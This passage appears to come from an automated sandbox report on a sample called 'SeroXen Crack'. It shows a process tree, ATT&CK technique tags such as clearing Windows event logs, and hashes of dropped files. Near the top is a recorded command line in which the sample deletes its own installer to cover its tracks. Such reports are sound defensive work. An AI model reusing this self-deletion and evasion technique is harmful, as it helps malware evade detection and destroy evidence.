C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\SeroXen Crack\SeroXen-install.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\SeroXen Crack\SeroXen-install.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\SeroXen Crack\SeroXen-install.bat.exe" & exit4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2112 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:5460
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2112 -s 4245⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3272
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3528
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3548
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3920
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3984
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3080
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:908
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2756
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:1364
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:1532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:1980
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2168
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:3268
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:1140
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5884 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 436 -p 5836 -ip 58362⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5928
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 440 -p 3600 -ip 36002⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2428
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4908 -ip 49082⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- System Location Discovery: System Language Discovery
PID:1720
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 440 -p 4600 -ip 46002⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1980
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 400 -p 2112 -ip 21122⤵PID:3772
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Hide Artifacts
1Hidden Window
1Indicator Removal
1Clear Windows Event Logs
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
37KB
MD5e521e5e861d5cdcdf9209ff34a608b0a
SHA1feb117db464a73d1b78b0f6ac31777fc9ba7b3c0
SHA256d604775167bad4f3f88655dc689dbf62b9383cc0dd4c0888f0b08b730884d137
SHA51274f543f7a68dfea14e24ea89042db7fee1c11a50f80fea48b0d4f823f5ca07734249e1d0b8a03663230ffe74e53a28eb47b3ac12b8cce7c8b68a067b44f83be8
-
Filesize
37KB
MD5de21bef9e4ff9af9443e29f59efd667e
SHA1a4297023f14e8f06a95fffef09f6f8c943cd1b81
SHA256e4c52fe62ba72216415ff7ec90a127c78fad45bc9e7270545137d54598821e69
SHA512ba9678a5e5f4c6e206625164a7b2089bef9b64f4f0d4ab6f96db38063e8b9e4577aeadf649b80245bd2697b44862838897639befb4097b5347a6d8fb8ed098e3
-
Filesize
13KB
MD53dca05071a27fe2a2404e0298ba1433a
SHA1b680ed38a8882ce96250483c59fef52a1d838ea2
SHA256cfeb1305004cc4a4d3cd7faff57fdc9c027a0bfab0823bc67d6bb14cbcc081af
SHA5128be1d7a7b58c3de73be6ca944979b3a93a1c80f2e20f92625fd83ad5e93f5173aefe105ac68de17ca217d2f6f87b9b3dcbe739b177cd6db8fe72648721eacb20
-
Filesize
13KB
MD5d571505340f07d26fccd094e6e7cac87
SHA17459b639fdf1adb095ba03ad4cc18fd88f9fc8ea
SHA2563b93dbf5d7e41ae1a0835cd28a3d3d58f5925995b5f5cbe0cafe13368476c8d9
SHA512a2523f3137a3711229c1960eb346cf9a16e472779b2df023a3be337cedecd8254dbdc4f85ca38b8c9258e6d09c35c9c6b117cc0c79b042dc02f36e3974a20dd8
-
Filesize
13KB
MD5860ed56b5709628a61aba17751117cc3
SHA145e02902b99d5deebeec2ecfdfaf55addbcae38e
SHA25662dd6788ec73a553c1f3eb7da0dcd68fe10b972e997db7846912f44a5e97eaf5
SHA512f466704d973afccabfc5ec903d029cf7be9fabf8e60ef7f04d165802ef4c91db2457788b6fd67423df4d494f10d7b58c65993e6eaf1ac77b7ed44932704ab634
-
Filesize
36KB
MD51743462f023354c82dc99b1d24ce6ab7
SHA1cb14ab56b1d6552f2cbca1a8277409327a87442a
SHA256f1fd930897054ff68b146381ffe1d73d67c8a513c1695291190e6e7128bf4f2f
SHA512755edcc64129ffe3ad46cd576f713b3316db36638f0b05b61aa26930e9a5a7ac371bafee5305eba762e9025a3206c8a037352298086e2e69477cfcb179e3286a
-
Filesize
13KB
MD518792a42ca5e803f89c9567b158225a9
SHA1af5c92bbbce71c2702aad260a8f7ca17f0e80d9c
SHA25626e23d909aec529f5fbb8ea5b7a1c3a612b6e0954ad4061e96b438b2c3929f09
SHA51206e262273cd872e9e3fa544978d7b20cd77def0fbc1b24d12ca50c4384b237a483efc06260250b0cb253f17ccc5698e614794857b83e710e4b2ae88faaaf2704
-
Filesize
13KB
MD51e003ec02352de355285a4a0b4d83606
SHA144e9ba4ce9a5c7ae4d08c75e5a074054ba3084f8
SHA256518f3e8783894f04f34c0b40d5689b594171d94b3ef01c8a360a6ee951c72e0f
SHA5129371c7de746812a8f7a16a90a0152a45ead74b8743581b87a311500c5146c454f9bd31d1b1618f5ece8e31d78310ac63e526b3423b55fcec843a3e2ec402ea40
-
Filesize
36KB
MD5ce759d63c418220b69fab21f2a7d1ade
SHA110438ac732aec6f88f7f8f78807879bdbc56b69f
SHA2563a4baac6fddc6769d00c1a6bb1b2cd46a23cf164a280e7475c0e1d1be7661799
SHA512934614a8a58911dacf505a7c8cad78d391e1b76b30f44b7326c5725f4427b9a785507179c3cd4a7122994f44e89207fa14cb540c498ff2805cdff2a4de455056
-
Filesize
37KB
MD527ef3e6428595400482b96da2cf37c6a
SHA119fbe2054763d76abcd77a0aff9aeef11ccd3095
SHA256982011dbe2592296b11fffd37784d281f4a6ed6ca56f3162b751ce2fc86a2c10
SHA512b27f8f758e13710269a2ad3195e911f5a0fcae8f8736e4518ceee217fe500f588f1ee7fc42082a281d9f9556036bc1279a7c9215125946b6c73f8ee51ab0a664
-
Filesize
440KB
MD50e9ccd796e251916133392539572a374
SHA1eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
324KB
MD5c5db7b712f280c3ae4f731ad7d5ea171
SHA1e8717ff0d40e01fd3b06de2aa5a401bed1c907cc
SHA256f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba
SHA512bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89
-
Filesize
32KB
MD5356e04e106f6987a19938df67dea0b76
SHA1f2fd7cde5f97427e497dfb07b7f682149dc896fb
SHA2564ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e
SHA512df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd